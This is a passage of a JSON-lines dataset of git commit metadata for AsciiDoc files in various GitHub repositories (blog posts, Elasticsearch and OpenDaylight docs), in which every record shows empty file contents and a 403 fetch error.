dbm-changelog-sync-sql.adoc","repos":"jako512\/grails-database-migration,sbglasius\/grails-database-migration","old_file":"src\/docs\/asciidoc\/ref\/Maintenance Scripts\/dbm-changelog-sync-sql.adoc","new_file":"src\/docs\/asciidoc\/ref\/Maintenance Scripts\/dbm-changelog-sync-sql.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jako512\/grails-database-migration.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8ff1246d13b7a744eef6aa62d61acf320a1963d8","subject":"Update 2015-12-10-Trabalhando-com-CA-e-certificados-Auto-assinados.adoc","message":"Update 2015-12-10-Trabalhando-com-CA-e-certificados-Auto-assinados.adoc","repos":"euprogramador\/euprogramador.github.io,euprogramador\/euprogramador.github.io,euprogramador\/euprogramador.github.io","old_file":"_posts\/2015-12-10-Trabalhando-com-CA-e-certificados-Auto-assinados.adoc","new_file":"_posts\/2015-12-10-Trabalhando-com-CA-e-certificados-Auto-assinados.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/euprogramador\/euprogramador.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80824f1594a898e0321a7ea2c854a392a4510fa7","subject":"Update 2016-02-13-Nebengerausche-bei-der-Audioausgabe-Raspberry-Pi.adoc","message":"Update 2016-02-13-Nebengerausche-bei-der-Audioausgabe-Raspberry-Pi.adoc","repos":"StefanBertels\/stefanbertels.github.io,StefanBertels\/stefanbertels.github.io,StefanBertels\/stefanbertels.github.io,StefanBertels\/stefanbertels.github.io","old_file":"_posts\/2016-02-13-Nebengerausche-bei-der-Audioausgabe-Raspberry-Pi.adoc","new_file":"_posts\/2016-02-13-Nebengerausche-bei-der-Audioausgabe-Raspberry-Pi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/StefanBertels\/stefanbertels.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"309529fd56e09d4ddb47e28e30becdb79264d41f","subject":"Update 2017-12-18-P-H-Per-Golang.adoc","message":"Update 2017-12-18-P-H-Per-Golang.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-18-P-H-Per-Golang.adoc","new_file":"_posts\/2017-12-18-P-H-Per-Golang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d277e9e53d35cf2b2f35f8795bf607c9b3d10d62","subject":"Deleted 2016-6-25-Git-one.adoc","message":"Deleted 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d95e66dc405ee035e75fcf68be336a18ec1c37f8","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df206cd82eda598acd9ed1f292c7f0555c81396a","subject":"Update 2015-08-13-Reversing-and-Decrypting-the-Challenger-Encrypted-File-Format.adoc","message":"Update 2015-08-13-Reversing-and-Decrypting-the-Challenger-Encrypted-File-Format.adoc","repos":"reversergeek\/reversergeek.github.io,reversergeek\/reversergeek.github.io,reversergeek\/reversergeek.github.io","old_file":"_posts\/2015-08-13-Reversing-and-Decrypting-the-Challenger-Encrypted-File-Format.adoc","new_file":"_posts\/2015-08-13-Reversing-and-Decrypting-the-Challenger-Encrypted-File-Format.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reversergeek\/reversergeek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"946c2234da54de825cd4e302c8bc7a97d42152b8","subject":"Update 2017-05-15-Common-Mistakes-in-C-Null-Terminating-Strings-and-comparisons.adoc","message":"Update 2017-05-15-Common-Mistakes-in-C-Null-Terminating-Strings-and-comparisons.adoc","repos":"lauesa\/Blog,lauesa\/Blog,lauesa\/Blog,lauesa\/Blog","old_file":"_posts\/2017-05-15-Common-Mistakes-in-C-Null-Terminating-Strings-and-comparisons.adoc","new_file":"_posts\/2017-05-15-Common-Mistakes-in-C-Null-Terminating-Strings-and-comparisons.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lauesa\/Blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e2f9cca292629bef95b12606ae3f5502a70b981","subject":"y2b create post Deus Ex Human Revolution Augmented Edition Unboxing","message":"y2b create post Deus Ex Human Revolution Augmented Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-08-23-Deus-Ex-Human-Revolution-Augmented-Edition-Unboxing.adoc","new_file":"_posts\/2011-08-23-Deus-Ex-Human-Revolution-Augmented-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b86833e604f85b8e7550237b53c75ce7c6c076de","subject":"Rephr, Sonatype link","message":"Rephr, Sonatype link\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Maven.adoc","new_file":"Best practices\/Maven.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d392014b4b1b49e31c391c299884b7c15defc0d","subject":"Added references and a bit of extra info","message":"Added references and a bit of extra info\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2a101358ad8fbce1b1d9050a8bd32e2e0aeccd8c","subject":"y2b create post iPhone 7 Plus - Is There A Hissing Problem?","message":"y2b create post iPhone 7 Plus - Is There A Hissing Problem?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-18-iPhone-7-Plus--Is-There-A-Hissing-Problem.adoc","new_file":"_posts\/2016-09-18-iPhone-7-Plus--Is-There-A-Hissing-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f706c222f2b1605a199cb29eac04953ad9cd9bff","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97808d791c8e847bdad27b1ceab11da87458afbc","subject":"y2b create post PS Vita Cradle Unboxing (Dock) \\u0026 More!","message":"y2b create post PS Vita Cradle Unboxing (Dock) \\u0026 More!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-02-25-PS-Vita-Cradle-Unboxing-Dock-u0026-More.adoc","new_file":"_posts\/2012-02-25-PS-Vita-Cradle-Unboxing-Dock-u0026-More.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbc41c04b35ef8b206591e2652da3c3137174dcc","subject":"Kinesis blog post","message":"Kinesis blog post\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2018-08-30-streaming-mysql-data-changes-into-kinesis.adoc","new_file":"blog\/2018-08-30-streaming-mysql-data-changes-into-kinesis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"69f4d2b0c8f89b715cad50e378a79f940fb11962","subject":"BUG-5280: add asciidoc outline of CDS implementation","message":"BUG-5280: add asciidoc outline of CDS implementation\n\nAdds the basic document outlining requirements place on the data store,\nits architecture and basic tradeoffs taken. This is not a final revision,\nbut rather an initial cut at it. It is expected this document will evolve\nfurther and will remain updated as the design\/implementation changes.\n\nChange-Id: I77de9971beaf8303a7ae0e0d1fc0d4d86ae64e5c\nSigned-off-by: Robert Varga <b8bd3df785fdc0ff42dd1710c5d91998513c57ef@cisco.com>\n","repos":"opendaylight\/controller","old_file":"opendaylight\/md-sal\/sal-distributed-datastore\/src\/site\/asciidoc\/distributed-data-store.adoc","new_file":"opendaylight\/md-sal\/sal-distributed-datastore\/src\/site\/asciidoc\/distributed-data-store.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opendaylight\/controller.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"83d7f199c76195bca371ce356e4171722e95bd5e","subject":"Partial draft for Java Update-by-Query","message":"Partial draft for Java Update-by-Query\n","repos":"yanjunh\/elasticsearch,nazarewk\/elasticsearch,yanjunh\/elasticsearch,i-am-Nathan\/elasticsearch,scorpionvicky\/elasticsearch,JackyMai\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,nezirus\/elasticsearch,dpursehouse\/elasticsearch,avikurapati\/elasticsearch,wenpos\/elasticsearch,Shepard1212\/elasticsearch,mikemccand\/elasticsearch,geidies\/elasticsearch,bawse\/elasticsearch,mortonsykes\/elasticsearch,uschindler\/elasticsearch,elasticdog\/elasticsearch,shreejay\/elasticsearch,i-am-Nathan\/elasticsearch,JackyMai\/elasticsearch,glefloch\/elasticsearch,umeshdangat\/elasticsearch,jimczi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gfyoung\/elasticsearch,masaruh\/elasticsearch,sneivandt\/elasticsearch,IanvsPoplicola\/elasticsearch,dongjoon-hyun\/elasticsearch,glefloch\/elasticsearch,geidies\/elasticsearch,kalimatas\/elasticsearch,avikurapati\/elasticsearch,ZTE-PaaS\/elasticsearch,mohit\/elasticsearch,geidies\/elasticsearch,Helen-Zhao\/elasticsearch,wuranbo\/elasticsearch,obourgain\/elasticsearch,Stacey-Gammon\/elasticsearch,pozhidaevak\/elasticsearch,s1monw\/elasticsearch,wangtuo\/elasticsearch,qwerty4030\/elasticsearch,jimczi\/elasticsearch,fred84\/elasticsearch,henakamaMSFT\/elasticsearch,nilabhsagar\/elasticsearch,jprante\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,MaineC\/elasticsearch,masaruh\/elasticsearch,dpursehouse\/elasticsearch,dongjoon-hyun\/elasticsearch,jimczi\/elasticsearch,a2lin\/elasticsearch,LewayneNaidoo\/elasticsearch,shreejay\/elasticsearch,elasticdog\/elasticsearch,nilabhsagar\/elasticsearch,sreeramjayan\/elasticsearch,mortonsykes\/elasticsearch,wangtuo\/elasticsearch,scottsom\/elasticsearch,rlugojr\/elasticsearch,nezirus\/elasticsearch,brandonkearby\/elasticsearch,cwurm\/elasticsearch,sreeramjayan\/elasticsearch,gmarz\/elasticsearch,fforbeck\/elasticsearch,coding0011\/elasticsearch,maddin2016\/elasticsearch,fred84\/elasticsearch,maddin2016\/elasticsearch,gfyoung\/elasticsearch,umeshdangat\/elasticsearch,strapdata\/elassandra,MaineC\/elasticsearch,pozhidaevak\/elasticsearch,a2lin\/elasticsearch,dongjoon-hyun\/elasticsearch,liweinan0423\/elasticsearch,rajanm\/elasticsearch,C-Bish\/elasticsearch,qwerty4030\/elasticsearch,GlenRSmith\/elasticsearch,umeshdangat\/elasticsearch,rajanm\/elasticsearch,markwalkom\/elasticsearch,robin13\/elasticsearch,henakamaMSFT\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,cwurm\/elasticsearch,strapdata\/elassandra,fred84\/elasticsearch,coding0011\/elasticsearch,pozhidaevak\/elasticsearch,s1monw\/elasticsearch,s1monw\/elasticsearch,fernandozhu\/elasticsearch,a2lin\/elasticsearch,fernandozhu\/elasticsearch,MisterAndersen\/elasticsearch,JervyShi\/elasticsearch,nknize\/elasticsearch,rajanm\/elasticsearch,lks21c\/elasticsearch,ricardocerq\/elasticsearch,mjason3\/elasticsearch,winstonewert\/elasticsearch,s1monw\/elasticsearch,vroyer\/elassandra,LewayneNaidoo\/elasticsearch,LeoYao\/elasticsearch,girirajsharma\/elasticsearch,Shepard1212\/elasticsearch,StefanGor\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,fred84\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra5-rc,kalimatas\/elasticsearch,wenpos\/elasticsearch,JackyMai\/elasticsearch,uschindler\/elasticsearch,Helen-Zhao\/elasticsearch,kalimatas\/elasticsearch,JervyShi\/elasticsearch,fernandozhu\/elasticsearch,mjason3\/elasticsearch,LeoYao\/elasticsearch,sreeramjayan\/elasticsearch,fred84\/elasticsearch,qwerty4030\/elasticsearch,strapdata\/elassandra5-rc,strapdata\/elassandra,LeoYao\/elasticsearch,mortonsykes\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,bawse\/elasticsearch,henakamaMSFT\/elasticsearch,Helen-Zhao\/elasticsearch,vroyer\/elasticassandra,LeoYao\/elasticsearch,avikurapati\/elasticsearch,qwerty4030\/elasticsearch,zkidkid\/elasticsearch,JackyMai\/elasticsearch,cwurm\/elasticsearch,MisterAndersen\/elasticsearch,gmarz\/elasticsearch,shreejay\/elasticsearch,girirajsharma\/elasticsearch,wuranbo\/elasticsearch,sreeramjayan\/elasticsearch,bawse\/elasticsearch,zkidkid\/elasticsearch,elasticdog\/elasticsearch,bawse\/elasticsearch,Stacey-Gammon\/elasticsearch,masaruh\/elasticsearch,IanvsPoplicola\/elasticsearch,artnowo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,lks21c\/elasticsearch,rlugojr\/elasticsearch,robin13\/elasticsearch,awislowski\/elasticsearch,maddin2016\/elasticsearch,Helen-Zhao\/elasticsearch,jimczi\/elasticsearch,wangtuo\/elasticsearch,JSCooke\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,dongjoon-hyun\/elasticsearch,yanjunh\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,geidies\/elasticsearch,awislowski\/elasticsearch,nknize\/elasticsearch,dpursehouse\/elasticsearch,geidies\/elasticsearch,vroyer\/elasticassandra,elasticdog\/elasticsearch,awislowski\/elasticsearch,rajanm\/elasticsearch,mikemccand\/elasticsearch,IanvsPoplicola\/elasticsearch,LeoYao\/elasticsearch,girirajsharma\/elasticsearch,mjason3\/elasticsearch,masaruh\/elasticsearch,shreejay\/elasticsearch,cwurm\/elasticsearch,elasticdog\/elasticsearch,avikurapati\/elasticsearch,rlugojr\/elasticsearch,GlenRSmith\/elasticsearch,JSCooke\/elasticsearch,yanjunh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,strapdata\/elassandra,yanjunh\/elasticsearch,strapdata\/elassandra5-rc,liweinan0423\/elasticsearch,spiegela\/elasticsearch,ricardocerq\/elasticsearch,HonzaKral\/elasticsearch,ZTE-PaaS\/elasticsearch,shreejay\/elasticsearch,MisterAndersen\/elasticsearch,artnowo\/elasticsearch,scottsom\/elasticsearch,nezirus\/elasticsearch,ZTE-PaaS\/elasticsearch,glefloch\/elasticsearch,alexshadow007\/elasticsearch,glefloch\/elasticsearch,fernandozhu\/elasticsearch,strapdata\/elassandra5-rc,C-Bish\/elasticsearch,zkidkid\/elasticsearch,jprante\/elasticsearch,sneivandt\/elasticsearch,alexshadow007\/elasticsearch,JackyMai\/elasticsearch,robin13\/elasticsearch,mohit\/elasticsearch,StefanGor\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,mjason3\/elasticsearch,henakamaMSFT\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,ricardocerq\/elasticsearch,sreeramjayan\/elasticsearch,artnowo\/elasticsearch,markwalkom\/elasticsearch,spiegela\/elasticsearch,gmarz\/elasticsearch,naveenhooda2000\/elasticsearch,girirajsharma\/elasticsearch,glefloch\/elasticsearch,Shepard1212\/elasticsearch,IanvsPoplicola\/elasticsearch,jimczi\/elasticsearch,ricardocerq\/elasticsearch,wuranbo\/elasticsearch,njlawton\/elasticsearch,nilabhsagar\/elasticsearch,scottsom\/elasticsearch,nilabhsagar\/elasticsearch,cwurm\/elasticsearch,lks21c\/elasticsearch,obourgain\/elasticsearch,wenpos\/elasticsearch,strapdata\/elassandra5-rc,mortonsykes\/elasticsearch,winstonewert\/elasticsearch,mikemccand\/elasticsearch,a2lin\/elasticsearch,alexshadow007\/elasticsearch,MisterAndersen\/elasticsearch,naveenhooda2000\/elasticsearch,alexshadow007\/elasticsearch,zkidkid\/elasticsearch,nezirus\/elasticsearch,kalimatas\/elasticsearch,ZTE-PaaS\/elasticsearch,maddin2016\/elasticsearch,C-Bish\/elasticsearch,JervyShi\/elasticsearch,brandonkearby\/elasticsearch,GlenRSmith\/elasticsearch,sneivandt\/elasticsearch,njlawton\/elasticsearch,markwalkom\/elasticsearch,strapdata\/elassandra,njlawton\/elasticsearch,JSCooke\/elasticsearch,naveenhooda2000\/elasticsearch,girirajsharma\/elasticsearch,nazarewk\/elasticsearch,lks21c\/elasticsearch,rajanm\/elasticsearch,fforbeck\/elasticsearch,LewayneNaidoo\/elasticsearch,sneivandt\/elasticsearch,Stacey-Gammon\/elasticsearch,Helen-Zhao\/elasticsearch,njlawton\/elasticsearch,kalimatas\/elasticsearch,gfyoung\/elasticsearch,naveenhooda2000\/elasticsearch,uschindler\/elasticsearch,ZTE-PaaS\/elasticsearch,jprante\/elasticsearch,StefanGor\/elasticsearch,StefanGor\/elasticsearch,brandonkearby\/elasticsearch,zkidkid\/elasticsearch,alexshadow007\/elasticsearch,gingerwizard\/elasticsearch,avikurapati\/elasticsearch,obourgain\/elasticsearch,rajanm\/elasticsearch,MaineC\/elasticsearch,mjason3\/elasticsearch,JervyShi\/elasticsearch,ricardocerq\/elasticsearch,robin13\/elasticsearch,vroyer\/elassandra,maddin2016\/elasticsearch,scorpionvicky\/elasticsearch,artnowo\/elasticsearch,awislowski\/elasticsearch,dongjoon-hyun\/elasticsearch,liweinan0423\/elasticsearch,nilabhsagar\/elasticsearch,brandonkearby\/elasticsearch,gmarz\/elasticsearch,njlawton\/elasticsearch,awislowski\/elasticsearch,wuranbo\/elasticsearch,liweinan0423\/elasticsearch,robin13\/elasticsearch,wangtuo\/elasticsearch,Stacey-Gammon\/elasticsearch,artnowo\/elasticsearch,LewayneNaidoo\/elasticsearch,scottsom\/elasticsearch,umeshdangat\/elasticsearch,vroyer\/elasticassandra,obourgain\/elasticsearch,markwalkom\/elasticsearch,StefanGor\/elasticsearch,bawse\/elasticsearch,pozhidaevak\/elasticsearch,girirajsharma\/elasticsearch,naveenhooda2000\/elasticsearch,HonzaKral\/elasticsearch,scottsom\/elasticsearch,wuranbo\/elasticsearch,i-am-Nathan\/elasticsearch,spiegela\/elasticsearch,rlugojr\/elasticsearch,Shepard1212\/elasticsearch,obourgain\/elasticsearch,winstonewert\/elasticsearch,nazarewk\/elasticsearch,sreeramjayan\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,nazarewk\/elasticsearch,coding0011\/elasticsearch,mikemccand\/elasticsearch,JervyShi\/elasticsearch,nknize\/elasticsearch,wangtuo\/elasticsearch,gfyoung\/elasticsearch,masaruh\/elasticsearch,wenpos\/elasticsearch,fforbeck\/elasticsearch,winstonewert\/elasticsearch,scorpionvicky\/elasticsearch,i-am-Nathan\/elasticsearch,lks21c\/elasticsearch,markwalkom\/elasticsearch,Shepard1212\/elasticsearch,henakamaMSFT\/elasticsearch,vroyer\/elassandra,spiegela\/elasticsearch,mikemccand\/elasticsearch,mohit\/elasticsearch,C-Bish\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,coding0011\/elasticsearch,jprante\/elasticsearch,pozhidaevak\/elasticsearch,sneivandt\/elasticsearch,nezirus\/elasticsearch,a2lin\/elasticsearch,C-Bish\/elasticsearch,coding0011\/elasticsearch,brandonkearby\/elasticsearch,umeshdangat\/elasticsearch,JSCooke\/elasticsearch,gingerwizard\/elasticsearch,mohit\/elasticsearch,spiegela\/elasticsearch,wenpos\/elasticsearch,dpursehouse\/elasticsearch,liweinan0423\/elasticsearch,MisterAndersen\/elasticsearch,fforbeck\/elasticsearch,nazarewk\/elasticsearch,gmarz\/elasticsearch,mortonsykes\/elasticsearch,MaineC\/elasticsearch,geidies\/elasticsearch,markwalkom\/elasticsearch,JervyShi\/elasticsearch,rlugojr\/elasticsearch,fforbeck\/elasticsearch,mohit\/elasticsearch,dpursehouse\/elasticsearch,IanvsPoplicola\/elasticsearch,i-am-Nathan\/elasticsearch,scorpionvicky\/elasticsearch,winstonewert\/elasticsearch,LewayneNaidoo\/elasticsearch,jprante\/elasticsearch,MaineC\/elasticsearch,JSCooke\/elasticsearch,Stacey-Gammon\/elasticsearch,fernandozhu\/elasticsearch","old_file":"docs\/java-api\/docs\/update-by-query.asciidoc","new_file":"docs\/java-api\/docs\/update-by-query.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7a0e4b9eb8203c429f350113c196e9c3e4112690","subject":"Update 2012-12-4-Jogando-o-Censo-2010-no-PostgreSQL.adoc","message":"Update 2012-12-4-Jogando-o-Censo-2010-no-PostgreSQL.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2012-12-4-Jogando-o-Censo-2010-no-PostgreSQL.adoc","new_file":"_posts\/2012-12-4-Jogando-o-Censo-2010-no-PostgreSQL.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c14a402763ec24886ec97ef6dbe9a77b460a3b06","subject":"y2b create post YouTube Sent A Mysterious Package...","message":"y2b create post YouTube Sent A Mysterious Package...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-10-YouTube-Sent-A-Mysterious-Package.adoc","new_file":"_posts\/2017-01-10-YouTube-Sent-A-Mysterious-Package.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d000d17d47da259c8b20f9f55a63743daf59ca07","subject":"Update 2015-05-16-Faustino-loeza-Perez.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c11cce6a8f74c0d864771f2ec0cd979a9d9c11b","subject":"Update 2016-01-24-Puzzle-8-M-A-T-R-I-X.adoc","message":"Update 2016-01-24-Puzzle-8-M-A-T-R-I-X.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2016-01-24-Puzzle-8-M-A-T-R-I-X.adoc","new_file":"_posts\/2016-01-24-Puzzle-8-M-A-T-R-I-X.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b40afb0207051642dde8ea8ddd68b949f1c9a23","subject":"Update 2016-01-15-Smart-classroom-innovando-el-espacio-de-aprendizaje-con-TIC.adoc","message":"Update 2016-01-15-Smart-classroom-innovando-el-espacio-de-aprendizaje-con-TIC.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"_posts\/2016-01-15-Smart-classroom-innovando-el-espacio-de-aprendizaje-con-TIC.adoc","new_file":"_posts\/2016-01-15-Smart-classroom-innovando-el-espacio-de-aprendizaje-con-TIC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marchelo2212\/marchelo2212.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8c21c4ae04499d9e1ff4f0489af0cfee13d0b7f","subject":"y2b create post Corsair Vengeance 2000 Wireless Gaming Headset Unboxing \\u0026 Overview","message":"y2b create post Corsair Vengeance 2000 Wireless Gaming Headset Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-04-05-Corsair-Vengeance-2000-Wireless-Gaming-Headset-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-04-05-Corsair-Vengeance-2000-Wireless-Gaming-Headset-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a9e8273cf55b24226b0bd9204c6513f684a79f2","subject":"Update 2017-04-27-Fin-de-la-venta-anticipada-para-La-Alberca.adoc","message":"Update 2017-04-27-Fin-de-la-venta-anticipada-para-La-Alberca.adoc","repos":"ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es","old_file":"_posts\/2017-04-27-Fin-de-la-venta-anticipada-para-La-Alberca.adoc","new_file":"_posts\/2017-04-27-Fin-de-la-venta-anticipada-para-La-Alberca.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ditirambo\/ditirambo.es.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4d30def861ecbe076393f6d7769168c2b505c66","subject":"y2b create post Apple EarPods Review (New Apple EarPods Unboxing, Review \\u0026 Comparison)","message":"y2b create post Apple EarPods Review (New Apple EarPods Unboxing, Review \\u0026 Comparison)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-09-15-Apple-EarPods-Review-New-Apple-EarPods-Unboxing-Review-u0026-Comparison.adoc","new_file":"_posts\/2012-09-15-Apple-EarPods-Review-New-Apple-EarPods-Unboxing-Review-u0026-Comparison.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"106587068bb5a5a8b9db28144c1c172f96adc7df","subject":"Introduce the validation problem troubleshooting page","message":"Introduce the validation problem troubleshooting 